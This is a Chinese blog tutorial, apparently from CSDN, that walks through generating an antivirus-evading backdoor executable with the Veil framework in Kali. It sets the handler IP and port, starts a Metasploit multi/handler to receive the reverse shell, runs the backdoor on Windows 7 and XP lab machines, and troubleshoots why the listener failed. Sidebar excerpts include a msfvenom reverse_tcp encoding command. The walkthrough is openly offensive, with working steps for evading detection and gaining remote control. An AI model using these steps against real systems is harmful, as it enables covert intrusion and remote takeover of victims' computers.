【kali-漏洞利用】(3.4)免杀Payload 生成工具(下):Veil后门使用、监听失败原因

最新推荐文章于 2024-05-14 14:18:01 发布
最新推荐文章于 2024-05-14 14:18:01 发布
阅读量1.5k 收藏 22
点赞数 2
分类专栏: 0X03【kali渗透】 文章标签: 安全 linux
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_53079406/article/details/126196753
版权

目录

一、veil使用

1.1、启动:

1.2、分类

1.3、利用msf测试

启动:

利用模块:

1.4、免杀payload被运行

win7

winxp

1.5、结果

1.6、错误:

一、veil使用

1.1、启动:

打开终端,并输入veil进入交互界面

1.2、分类

veil有两个免杀的⼯具:Evasion和Ordnance

Evasion⽤来对⽂件进行免杀处理

Ordnance可⽣成在Veil-Evasion中使⽤的shellcode

use Evasion
   #选择Evasion功能 

list 
   #查看payload列

大多选用go和ruby语言编码的

use 7

 Required Options:需要都填上(这里LHOST为空,要补上,其余的可以修改)

Required Options:
                                                                                                          
Name                    Value           Description
----                    -----           -----------
COMPILE_TO_EXE          Y               Compile to an executable
LHOST                                   IP of the Metasploit handler
LPORT                   4444            Port of the Metasploit handler

输入 generate 执行payload

然后输入产生的文件名

/var/lib/veil/output/compiled/test.exe

 Executable(可执行)

Source code(源代码)

Metasploit Resource(Metasploit资源)

1.3、利用msf测试

启动:

sudo msfconsole -r /var/lib/veil/output/handlers/test.rc

 

利用模块:

use exploit/multi/handler

show options

set lhost 192.168.190.149

exploit

(然后开始监听了) 

1.4、免杀payload被运行

win7

现在将后门放到目标机中(这里是win7)

然后运行它

 

 

winxp

我现在试一下winxp

 

 

1.5、结果

winxp测试的2次,就是那个后门在winxp上运行时候报错

然后监听失败

 

win7测试的2次

在win7上运行没有保错

 

 最后出现了会话控制

 

1.6、无法监听错误改正

错误过程一:

无法监听到后门端口

随机设置的端口没有开放

lsof -i:端口号

没查到端口信息
systemctl start firewalld

firewall-cmd --zone=public --add-port=1935/tcp --permanent



--zone #作用域 
 
--add-port=1935/tcp #添加端口,格式为:端口/通讯协议 
 
--permanent #永久生效,没有此参数重启后失效

firewall-cmd --reload //重启防火墙

netstat -ntlp   //查看当前所有tcp端口· 
 
netstat -ntulp |grep 1935   //查看所有1935端口使用情况

错误过程二:

最后我认为是

先用nmap扫描目标开放的tcp端口,然后再生成相应端口的木马

使自己,和目标开放端口都一样

最后错误原因

是我启动的时候

直接是sudo msfconsole

正确做法:

通过以下方法启动msfconsole

sudo msfconsole -r /var/lib/veil/output/handlers/test.rc

黑色地带(崛起)
关注
  • 2
    点赞
  • 22
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 5
    评论
专栏目录
kali免杀工具Veil Evasion
scholar_1的博客
07-04 3044
首先,介绍一下Veil Evasion,Veil Evasion是linux的一款免杀工具,是一个用 Python 编写的免杀框架,用来生成MSF的Payload,能绕过常见的杀毒软件,它可以将任意脚本或一段 Shellcode 转换成 Windows 可执行文件,从而逃避常见防病毒产品的检测。关于MSF,它就是一个漏洞框架(全称:The Metasploit Framework),嗯,免费,通过这个框架,我们可以很容易的对于软件的漏洞进行攻击。它本身带有几千个漏洞攻击工具。......
kali免杀工具shellter
scholar_1的博客
08-06 3965
工具安装完成后再/usr/share/windows-resources/shellter 这个文件夹shellter目录下的Shellter_Backups文件夹是你注入文件后备份的文件夹,会自动把原文件备份一个到这个文件夹下。Choose Operation Mode - Auto/Manual (A/M/H):A //A:自动模式自动注入后门,M:高级模式,H:帮助。(Y/N/H): Y //是否启用隐身模式 Y:启用 N:不启用 H:帮助。...
最新kali关于无线网卡监听失败扫描不到wifi的解决方法
weixin_74711824的博客
02-01 7969
在进行wifi监听时,出现监听不到WiFi的一些解决方法。
2024年Android最新Kali利用MSF渗透安卓手机_kali入侵安卓手机,安卓常见面试题
2401_84544993的博客
05-14 1063
给大家分享一份移动架构大纲,包含了移动架构师需要掌握的所有的技术体系,大家可以对比一下自己不足或者欠缺的地方有方向的去学习提升;网上学习资料一大堆,但如果学到的知识不成体系,遇到问题时只是浅尝辄止,不再深入研究,那么很难做到真正的技术提升。需要这份系统化学习资料的朋友,可以戳这里获取一个人可以走的很快,但一群人才能走的更远!不论你是正从事IT行业的老鸟或是对IT行业感兴趣的新人,都欢迎加入我们的的圈子(技术交流、学习资源、职场吐槽、大厂内推、面试辅导),让我们一起学习成长!
Kali-linux免杀Payload生成工具Veil
2301_77162959的博客
05-18 957
Veil是一款利用Metasploit框架生成相兼容的Payload工具,并且在大多数网络环境中能绕过常见的杀毒软件。本节将介绍Veil工具的安装及使用
Kali之Metasploit生成apk后门远控电脑或手机
qq_45956062的博客
12-04 919
Metasploit 是一款开源的渗透测试工具,可以帮助网络安全专家和黑客发现和利用计算机系统当中的漏洞。本文用kali来做演示,实验中请更改为你环境的IP。文章内容仅供学习。
KALI(三)免杀
qq_29507011的博客
10-15 559
kali
免杀工具--veil-evasion
11-21
这个东西下了好久的,用过都知道GitHub下载死慢的,就分享出来赚点积分吧
kali-linux-2023.3-vmware-amd64.part3.rar
10-13
kali-linux-2023.3(kali-linux-2023.3-vmware-amd64.7z)适用于VMware系统,文件使用WinRAR分割成四个压缩包,必须一起下载使用: 文件1:https://download.csdn.net/download/weixin_43800734/88423344 文件2:...
kali-linux-wireless-pentest_kali使用指南_productg6t_kali_kali-linux-
10-01
kali Linux详细指南,后续在更新
kali-my-linux:在Linux上安装Kali Linux工具和其他工具
01-31
KaliLinux 自动安装Pentest工具去做 从GitHub下载软件包。 在所有发行版中运行。运行: 德比安Linux Mint 的Ubuntu ZorinOS Arch Linux 万家郎下载Debian,Ubuntu,Linux Mint ... git clone ...
Kali-Linux-Tools-Interface:开发图形化Web界面以促进安全信息工具使用
01-31
Kali Linux工具界面 用于通过浏览器使用信息安全工具的图形界面。 ·· 入门 Kali Linux Tools Interface是一个图形界面,用于通过浏览器使用信息安全工具。 该项目使用Kali Linux工具作为参考,因为它是具有最大...
kaliwin10免杀
h1825819493的博客
06-09 464
在查看配置的时候Required中写yes的都是需要进行配置的,有的是默认配置好的,但是也可以进行更改。对生成的马进行签名。新建一个文件夹,把签名用的python程序放在文件夹,在把生成的马放进去。生成win10免杀马,用360和火绒是识别不出来的(不能再win11下运行)windows隐藏绑定外壳。
Kali渗透-MSF木马免杀技术
小司机的奥拓
12-25 1793
道高一尺,魔高一丈。杀毒软件的更新是非常快的,这里给出的方法和过程在今天还是可行的。但过了几个月之后,免杀技术就有可能出现重大的变化和更新。免杀技术需要不断地磨练与实践,才能在实战中提高成功率。
阿里云服务器漏洞修复
h_1185823574的博客
10-23 5969
最近刚申请了一个阿里云服务器,用了一段时间后登陆就发现提示有漏洞了,然后我就尝试自己修复。 RHSA-2017:3263: curl security update 首先查看可升级系统软件。 yum check-update 然后更新所有可升级的系统软件 yum upgrade 当然,你可以升级指定系统软件。 yum update xxxx (xxxx为你要升级的系统软件) ...
kali-漏洞利用】(3.4免杀Payload 生成工具(上):Veil安装、启动、Can‘t find the WINE profile问题
08-06 1360
kali-漏洞利用免杀veil:安装、启动、问题
2021Kali -- 木马免杀制作
qq_50854662的博客
09-12 4966
​知道为什么梦里的人都看不清脸么?因为怕你当真。。。 ----  网易云热评    一、通过MSF生成shellcode 1、启动MSF,演示版本是6.0.36 2、通过msfvenom生成相关代码 msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 12 -b '\x...
后门的类型与kali生成后门如何实现,及如何使用
2301_77441874的博客
06-19 1514
小小的讲一下后门程序以及kali如何进行后门生成以及调用。
wsl --install -d kali-linuxkali-linux d:\WSL\kali.tar
最新发布
06-11
您提到的命令是用于在Windows Subsystem for Linux (WSL)中安装Kali Linux发行版。`wsl --install -d kali-linux` 是Windows命令行中的一项操作,`-d` 参数后面跟的是你要安装的Linux发行版的名称或URL,这里是 `kali-linux`,`kali.tar` 通常是指一个预先打包好的Kali Linux镜像文件。 具体步骤如下: 1. 首先,确保你的系统已经安装了WSL,可以在控制面板或设置中检查。 2. 如果你有Kali Linux的`.tar` 包(压缩格式),将其解压到一个本地目录,如 `D:\WSL\`。 3. 使用提供的命令 `wsl --install -d D:\WSL\kali.tar` 或者 `wsl --install -d kali-linux`(如果`.tar` 文件直接放在了指定路径)。 4. 运行该命令后,Windows会自动解压并安装Kali Linux到WSL环境中。 5. 安装可能需要一些时间,完成后你需要通过 `wsl` 命令或者WSL启动器打开新安装的Kali Linux。 相关问题: 1. 如何检查我的系统是否支持WSL? 2. WSL支持哪些常见的Linux发行版? 3. 如何在WSL中管理和切换不同的Linux发行版?

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 5
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

黑色地带(崛起)

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值